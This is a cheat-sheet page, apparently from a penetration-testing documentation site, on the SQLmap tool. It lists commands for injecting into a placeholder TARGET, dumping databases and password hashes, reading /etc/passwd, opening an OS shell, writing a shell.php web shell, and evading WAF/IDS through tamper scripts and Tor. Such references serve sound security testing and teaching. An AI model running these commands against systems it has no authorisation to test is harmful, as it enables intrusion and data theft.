> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# SQLmap

> SQLmap automated SQL injection: detection, extraction, OS shell, and tamper scripts.

## Basic Usage

```bash theme={"dark"}
sqlmap -u "http://TARGET/page?id=1"
sqlmap -u "http://TARGET/page?id=1" --batch          # Auto-answer prompts
sqlmap -u "http://TARGET/page?id=1" --dbs             # List databases
```

***

## Request Options

### POST Data

```bash theme={"dark"}
sqlmap -u "http://TARGET/login" --data="user=admin&pass=test"
```

### Cookie

```bash theme={"dark"}
sqlmap -u "http://TARGET/page?id=1" --cookie="PHPSESSID=abc123"
```

### Headers

```bash theme={"dark"}
sqlmap -u "http://TARGET/page?id=1" -H "Authorization: Bearer TOKEN"
sqlmap -u "http://TARGET/page?id=1" -H "X-Forwarded-For: 127.0.0.1"
```

### From Burp Request File

```bash theme={"dark"}
sqlmap -r request.txt
sqlmap -r request.txt -p id          # Specify parameter
```

### Custom Injection Point

```bash theme={"dark"}
sqlmap -u "http://TARGET/page" --data="id=1*"         # * marks injection point
sqlmap -r request.txt --headers="X-Custom: test*"
```

***

## Enumeration

```bash theme={"dark"}
sqlmap -u URL --dbs                                    # Databases
sqlmap -u URL -D dbname --tables                       # Tables
sqlmap -u URL -D dbname -T users --columns             # Columns
sqlmap -u URL -D dbname -T users --dump                # Dump table
sqlmap -u URL -D dbname -T users -C user,pass --dump   # Specific columns
sqlmap -u URL --dump-all                               # Dump everything
```

### Current Info

```bash theme={"dark"}
sqlmap -u URL --current-user
sqlmap -u URL --current-db
sqlmap -u URL --hostname
sqlmap -u URL --is-dba
sqlmap -u URL --privileges
sqlmap -u URL --passwords                              # Hash dump
```

***

## Techniques

```bash theme={"dark"}
sqlmap -u URL --technique=U          # UNION only
sqlmap -u URL --technique=B          # Boolean blind only
sqlmap -u URL --technique=T          # Time-based blind only
sqlmap -u URL --technique=E          # Error-based only
sqlmap -u URL --technique=S          # Stacked queries only
sqlmap -u URL --technique=BEUSTQ     # All (default; Q = inline queries)
```

| Flag | Technique           |
| ---- | ------------------- |
| `B`  | Boolean-based blind |
| `E`  | Error-based         |
| `U`  | UNION query         |
| `S`  | Stacked queries     |
| `T`  | Time-based blind    |

***

## OS Shell & File Access

### OS Shell

```bash theme={"dark"}
sqlmap -u URL --os-shell
sqlmap -u URL --os-cmd="whoami"
```

### SQL Shell

```bash theme={"dark"}
sqlmap -u URL --sql-shell
```

### File Read

```bash theme={"dark"}
sqlmap -u URL --file-read="/etc/passwd"
```

### File Write

```bash theme={"dark"}
sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"
```

***

## WAF / IDS Evasion

### Tamper Scripts

```bash theme={"dark"}
sqlmap -u URL --tamper=space2comment
sqlmap -u URL --tamper=between,randomcase
sqlmap -u URL --tamper=charencode
```

### Common Tampers

| Tamper           | Description                          |
| ---------------- | ------------------------------------ |
| `space2comment`  | Replace spaces with `/**/`           |
| `between`        | Replace `>` with `NOT BETWEEN 0 AND` |
| `randomcase`     | Random upper/lower case              |
| `charencode`     | URL-encode characters                |
| `equaltolike`    | Replace `=` with `LIKE`              |
| `base64encode`   | Base64 encode payload                |
| `apostrophemask` | Replace `'` with UTF-8               |
| `space2plus`     | Replace spaces with `+`              |

### List All Tampers

```bash theme={"dark"}
sqlmap --list-tampers
```

### Other Evasion

```bash theme={"dark"}
sqlmap -u URL --random-agent
sqlmap -u URL --delay=2              # Delay between requests
sqlmap -u URL --time-sec=10          # Time-based wait
sqlmap -u URL --level=5 --risk=3     # Max detection
sqlmap -u URL --hpp                  # HTTP Parameter Pollution
```

***

## Performance

```bash theme={"dark"}
sqlmap -u URL --threads=10
sqlmap -u URL --level=3              # 1-5, default 1
sqlmap -u URL --risk=2               # 1-3, default 1
```

| Level | Tests                 |
| ----- | --------------------- |
| 1     | GET/POST parameters   |
| 2     | + Cookie              |
| 3     | + User-Agent, Referer |
| 4     | + more payloads       |
| 5     | + Host header         |

***

## Proxy & Tor

```bash theme={"dark"}
sqlmap -u URL --proxy="http://127.0.0.1:8080"          # Burp proxy
sqlmap -u URL --tor --tor-type=SOCKS5 --check-tor
```

***

## Second-Order Injection

```bash theme={"dark"}
sqlmap -r request.txt --second-url="http://TARGET/profile"
```

***

## Quick Reference

| Task       | Command                                               |
| ---------- | ----------------------------------------------------- |
| Auto scan  | `sqlmap -u URL --batch --dbs`                         |
| Dump table | `sqlmap -u URL -D db -T tbl --dump`                   |
| OS shell   | `sqlmap -u URL --os-shell`                            |
| Read file  | `sqlmap -u URL --file-read="/etc/passwd"`             |
| WAF bypass | `sqlmap -u URL --tamper=space2comment --random-agent` |
| From Burp  | `sqlmap -r request.txt -p param`                      |

***

## Sources

* [SQLmap Official Documentation](https://github.com/sqlmapproject/sqlmap/wiki)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PortSwigger — SQL Injection](https://portswigger.net/web-security/sql-injection)
